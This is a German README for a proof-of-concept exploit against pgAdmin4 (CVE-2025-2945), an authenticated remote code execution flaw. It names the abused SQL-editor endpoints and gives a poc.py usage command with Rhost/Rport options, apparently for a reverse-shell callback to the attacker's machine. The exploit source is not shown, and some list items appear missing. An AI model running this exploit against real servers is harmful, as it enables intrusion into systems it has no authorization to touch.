
Proof-of-Concept-Exploit für authentifizierte Remote-Codeausführung in pgAdmin4 (CVE-2025-2945) über Missbrauch des SQL-Editors. Entwickelt für autorisierte Sicherheitstests und Schulungszwecke.
Dieses Repository enthält ein Proof-of-Concept-Skript, das für Sicherheitsforschung und autorisierte Penetrationstests im Zusammenhang mit der Schwachstelle CVE-2025-2945 erstellt wurde, die bestimmte Versionen von pgAdmin4 betrifft.
Das Problem erlaubt einem authentifizierten pgAdmin-Benutzer mit Zugriff auf den SQL-Editor, durch Missbrauch des Initialisierungsablaufs des Query-Tool-Panels eine Remote-Codeausführung auszulösen. Dieser PoC demonstriert die Schwachstelle nur für Bildungs-, Prüfungs- und Verteidigungszwecke.
Dieses Tool ist NUR für:
Verwende dieses Tool NICHT auf einem System ohne ausdrückliche Genehmigung. Unbefugte Nutzung ist illegal und unethisch. Der Autor ist nicht verantwortlich für Missbrauch.
Die Schwachstelle beruht auf Logikfehlern in den Initialisierungs-Endpunkten des SQL-Editors. Bei der Interaktion mit /sqleditor/initialize/ und /sqleditor/panel/ geht die Anwendung falsch mit benutzerkontrollierten Daten um, was letztendlich erlaubt, maßgeschneiderte Payloads zur Ausführung beliebiger Backend-Befehle zu nutzen.
Der PoC nutzt die folgende Endpunkt-Sequenz aus:
requests-Bibliothekpython3 poc.py \
--target-url <pgadmin-url> \
--username <pgadmin-user> \
--password <pgadmin-pass> \
--db-user <db-username> \
--db-pass <db-password> \
--db-name <database> \
--Rhost <your-ip> \
--Rport <your-port>
(Ein vollständiges Beispiel ist bereits im Hilfebereich des Skripts enthalten.)
poc.py → The exploit proof-of-concept
README.md → Project documentation
Administratoren sollten:
Autor: UdayVeer